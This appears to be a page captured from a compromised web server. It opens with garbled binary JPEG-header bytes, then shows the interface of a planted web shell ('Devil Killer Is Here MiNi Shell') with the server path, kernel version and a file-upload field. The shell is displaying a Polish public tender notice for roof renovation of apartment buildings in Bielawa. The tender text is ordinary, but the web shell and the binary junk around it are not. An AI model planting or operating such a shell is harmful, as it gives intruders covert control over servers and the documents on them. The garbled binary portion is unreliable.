JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211018/0023351701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa pokryć dachowych budynków mieszkalnych wielorodzinnych przy ul. Brzeżnej 6 oraz Małej 3 w Bielawie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;MIEJSKI ZARZĄD BUDYNKÓW MIESZKALNYCH&#34; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890679330</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">3 Maja 48</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bielawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-260</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">748334253</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">748334253</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">tomasz.pastuszka@mzbmbielawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzbmbielawa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka z o.o. </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie nieruchomościami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa pokryć dachowych budynków mieszkalnych wielorodzinnych przy ul. Brzeżnej 6 oraz Małej 3 w Bielawie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9b752a3c-2fd1-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00233517</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001727/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa pokryć dachowych budynków mieszkalnych wielorodzinnych przy ul. Brzeżnej 6 oraz Małej 3 w Bielawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9b752a3c-2fd1-11ec-a3fb-0a24f8cd532c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż wskazanych w Rozdziale XII SWZ),<br/>zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pomocą poczty elektronicznej, email: tomasz.pastuszka@mzbmbielawa.pl<br/>2. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP)<br/>3. Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać Zamawiający od Wykonawcy (Dz. U. z 2020 poz. 2415).<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi max.150 MB. W celu załączenia większej liczby dokumentów w jednym załączniku należy je odpowiednio podpisać, skompresować te pliki w formacie ZIP, a następnie załączyć do formularza.<br/>5. Osobą uprawnioną do porozumiewania się z Wykonawcami jest: Tomasz Pastuszka - kierownik DziałuTechnicznego tel. 74 833 42 53, e-mail: tomasz.pastuszka@mzbmbielawa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z 04.05.2016, str. 1), dalej „RODO” informujemy Państwa że:<br/> 1. Administratorem Państwa danych osobowych jest Prezes Miejskiego Zarządu Budynków Miesz-<br/> kalnych Sp. z o.o. w Bielawie z siedzibą: ul. 3 Maja 48, 58-260 Bielawa; adres e-mail: <br/> biuro@mzbmbielawa.pl <br/> 2. Informujemy przy tym, iż powołaliśmy Inspektora ochrony danych, z którym możecie się Pań<br/> stwo skontaktować we wszystkich sprawach związanych z przetwarzaniem danych osobowych: <br/> Aleksander Burzyński, adres e-mail: aleksander.burzynski@mzbmbielawa.pl lub pisemnie na adres <br/> Administratora. <br/> 3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związa-<br/> nym z postępowaniem o udzielenie zamówienia publicznego nr referencyjny DT.0001.817.2021 pn.: <br/> „Przebudowa pokryć dachowych budynków mieszkalnych wielorodzinnych przy ul. Brzeżnej 6 <br/> oraz Małej 3 w Bielawie” prowadzonym w trybie podstawowym.<br/> 4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym zostanie udostępniona <br/> dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 stycznia 2019 r. - <br/> Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019), dalej “ustawa Pzp”.<br/> 5. Państwa dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy pzp, przez okres 4 <br/> lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy prze-<br/> kracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/> 6. Obowiązek podania przez Państwo danych osobowych bezpośrednio Państwa dotyczących jest <br/> wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępo-<br/> waniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wyni-<br/> kają z ustawy Pzp. <br/> 7. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautoma-<br/> tyzowany, stosownie do art. 22 RODO.<br/> 8. Na podstawie art. 15 RODO posiadają Państwo prawo dostępu do danych osobowych Państwa <br/> dotyczących. <br/> 9. Na podstawie art. 16 RODO posiadają Państwo prawo do sprostowania Państwa danych osobo<br/> wych.<br/> 10. Na podstawie art. 18 RODO posiadają Państwo prawo żądania od administratora ograniczenia <br/> przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 <br/> RODO.<br/> 11. Posiadają Państwo prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/> gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy <br/> RODO.<br/> 12. W związku z art. 17 ust. 3 lit. B, d lub e RODO nie przysługuje Państwu prawo do <br/> usunięcia danych osobowych.<br/> 13. Nie przysługuje Państwu prawo do przenoszenia danych osobowych, o którym mowa w <br/> art. 20 RODO.<br/> 14. Na podstawie art. 21 RODO nie przysługuje Państwu prawo sprzeciwu, wobec <br/> przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych <br/> osobowych jest art. 6 ust. 1 lit. C RODO.<br/> 15. Na podst. Art.4 ust. 1 Ustawy z dnia 9 listopada 2018 r. o elektronicznym fakturowaniu<br/> w zamówieniach publicznych, koncesjach na roboty budowlane lub usługi oraz part-<br/> nerstwie publiczno – prywatnym, Zamawiający jest obowiązany do odbierania od Wyko<br/> nawcy ustrukturyzowanych faktur elektronicznych przesłanych za pośrednictwem platformy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DT.0001.817.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty budowlane polegające na:<br/> a) Modernizacji pokryć dachowych budynków mieszkalnych wielorodzinnych w zakresie:<br/> - rozebranie starych pokryć dachowych, rynien rur spustowych i obróbek blacharskich;<br/> - montaż kontrłat oraz łat,;<br/> - izolacje cieplne i akustyczne wykonywane płytami z wełny mineralnej gr. 12 cm układanymi w połaci<br/> dachu krokwiowego oraz między legarami na stropie;<br/> - wymiana podłogi na strychu na nowa z płyt OSB;<br/> - montaż rynien rur spustowych i obróbek blacharskich;<br/> - wykonanie połaci dachowych z dachówki;<br/> - wykonanie pasów tynku,<br/> - prace towarzyszące i porządkowe, rusztowania;<br/>b) Ponadto zakres rzeczowy zamówienia obejmuje:<br/> - organizację zaplecza prac,<br/>- uporządkowanie terenu po zakończeniu prac,<br/> • koszty wywozu oraz składowania gruzu na wysypisku,<br/> 3. Szczegółowy zakres robót określają przedmiary robót (załączniki nr 8, 8a do SWZ) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">49 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena łączna OFERTY stanowi sumę punktów uzyskanych w ramach wszystkich kryteriów. <br/>Uzyskana liczba punktów zaokrąglona będzie do drugiego miejsca po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/> 1) nie podlegają wykluczeniu na zasadach określonych w Rozdziale VIII SWZ;<br/> 2) spełniają warunki udziału w postępowaniu dotyczące:<br/> a) zdolności do występowania w obrocie gospodarczym - Zamawiający nie określa warunku udziału <br/> w tym zakresie,<br/> b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to <br/> z odrębnych przepisów - Zamawiający nie określa warunku udziału w tym zakresie, <br/> c) sytuacji ekonomicznej i finansowej (art. 112 ust. 2 pkt 3 ustawy pzp),<br/> Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej lub finansowej w <br/> przypadku, gdy Wykonawca wykaże, że posiada opłaconą polisę lub inny dokument potwierdzający, <br/> że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/> związanej z przedmiotem zamówienia na kwotę co najmniej:<br/> - 100.000,00 zł <br/> d) zdolności technicznej i zawodowej (art. 112 ust. 2 pkt. 4 ustawy pzp),<br/> Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże że:<br/>- co najmniej jednej osoby która posiada uprawnienia budowlane do kierowania robotami budowlanymi<br/> w specjalności konstrukcyjno –budowlanej.<br/>Uwaga: Zamawiający określając wymogi dla osoby w zakresie posiadanych ustawowych uprawnień zawodowych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, w zakresie którego właściwy organ wydaje decyzję w sprawie uznania kwalifikacji zawodowych na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. Nr 63, poz. 394, ze zm.).<br/><br/> - posiada niezbędną wiedzę i doświadczenie:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej 3 roboty budowlane o zakresie i charakterze zbliżonym do przedmiotu zamówienia o wartości co najmniej:<br/>- 100 000,00 zł każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega <br/> z opłacaniem podatków i opłat, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu <br/> składania ofert, a w przypadku zalegania z opłacaniem składek lub opłat dokumentów potwierdzających <br/> potwierdzających, że odpowiednio upływem terminu składania ofert wykonawca dokonał płatności na-<br/> leżnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w spra-<br/> wie spłat tych należności; <br/> 2. Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpie-<br/> czeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolni<br/> czego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na <br/> ubezpieczenia społeczne i zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, <br/> a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, dokumentów <br/> potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udzia<br/> łu w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych <br/> składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące <br/> porozumienie w sprawie spłat tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Dokument potwierdzający że wykonawca posiada opłaconą polisę lub inny dokument potwierdzający, <br/> że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/> związanej z przedmiotem zamówienia na kwotę co najmniej:<br/> - 100.000,00 zł <br/> 2. Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert <br/> a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, <br/> przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem <br/> dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których <br/> mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wy-<br/> konywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie <br/> uzyskać tych dokumentów – oświadczenie wykonawcy (Załącznik nr 4 do SWZ),<br/> 3. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz<br/> z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia <br/> niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie <br/> czynności, oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 5 do SWZ),</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia wadium dla każdej części zamówienia osobno w wysokości:<br/> Część I – 1900,00 zł (słownie: jeden tysiąc dziewięćset złotych 00/100 zł);<br/> Część II – 1300,00 zł (słownie: jeden tysiąc trzysta złotych 00/100 zł);<br/>2. Wadium może być wniesione w:<br/>1) pieniądzu; przelewem na rachunek bankowy: Bank Santander 1- o/Bielawa, Nr rachunku 66 1090 2284<br/> 0000 0001 1751 9313 z podaniem tytułu: Wadium w przetargu nieograniczonym na robotę budowlaną pn.<br/>I. Przebudowa pokrycia dachowego budynku mieszkalnego wielorodzinnego przy ul. Brzeżnej 6<br/> w Bielawie;<br/>II. Przebudowa pokrycia dachowego budynku mieszkalnego wielorodzinnego przy ul. Małej 3<br/> w Bielawie;<br/> i znaku postępowania: DT.0001.817.2021 <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy zdnia 9 listopada <br/> 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019r. poz.310, 836 i 1572). <br/>3. Wadium należy wnieść przed upływem terminu składania ofert, i utrzymuje nieprzerwanie do dnia<br/> upływu terminu związania ofertą z wyjątkiem przypadków opisanych w ust. 7 pkt 1 lit. b i c.<br/>4. Zamawiający zaleca, aby w przypadku wniesienia wadium w formie: <br/> a) pieniężnej – dokument potwierdzający dokonanie przelewu wadium został załączony do oferty; <br/> b) innej niż pieniądz – wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, <br/> w postaci elektronicznej <br/>5. Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.<br/>Pozostałe informacje w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zamawiający żąda wniesienia wadium dla każdej części zamówienia osobno w wysokości:<br/> Część I – 1900,00 zł 